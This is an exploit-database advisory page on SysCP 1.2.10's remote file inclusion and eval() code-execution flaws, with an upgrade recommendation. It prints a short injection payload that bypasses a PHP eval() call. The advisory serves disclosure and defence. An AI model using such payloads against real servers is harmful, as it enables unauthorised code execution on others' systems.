header-logo
Suggest Exploit
vendor:
SysCP
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include and Script Code Execution
94
CWE
Product Name: SysCP
Affected Version From: SysCP 1.2.10 and prior versions
Affected Version To: SysCP 1.2.10 and prior versions
Patch Exists: YES
Related CWE: N/A
CPE: a:syscp:syscp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

SysCP Multiple Script Execution Vulnerabilities

SysCP is affected by multiple script execution vulnerabilities. The application is affected by a remote file include vulnerability. An attacker can include remote script code and execute it in the context of an affected server. Another script code execution vulnerability may allow an attacker to call arbitrary functions and scripts by bypassing a PHP eval() statement. The following string is sufficient to bypass the eval() call: {${phpinfo();}}

Mitigation:

Upgrade to the latest version of SysCP, which is not vulnerable to these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14490/info

SysCP is affected by multiple script execution vulnerabilities.

The following specific vulnerabilities were identified:

The application is affected by a remote file include vulnerability. An attacker can include remote script code and execute it in the context of an affected server.

Another script code execution vulnerability may allow an attacker to call arbitrary functions and scripts by bypassing a PHP eval() statement.

SysCP 1.2.10 and prior versions are prone to these vulnerabilities.

The following string is sufficient to bypass the eval() call:
{${phpinfo();}}

Navigation

Suggest Exploit

Services By CQR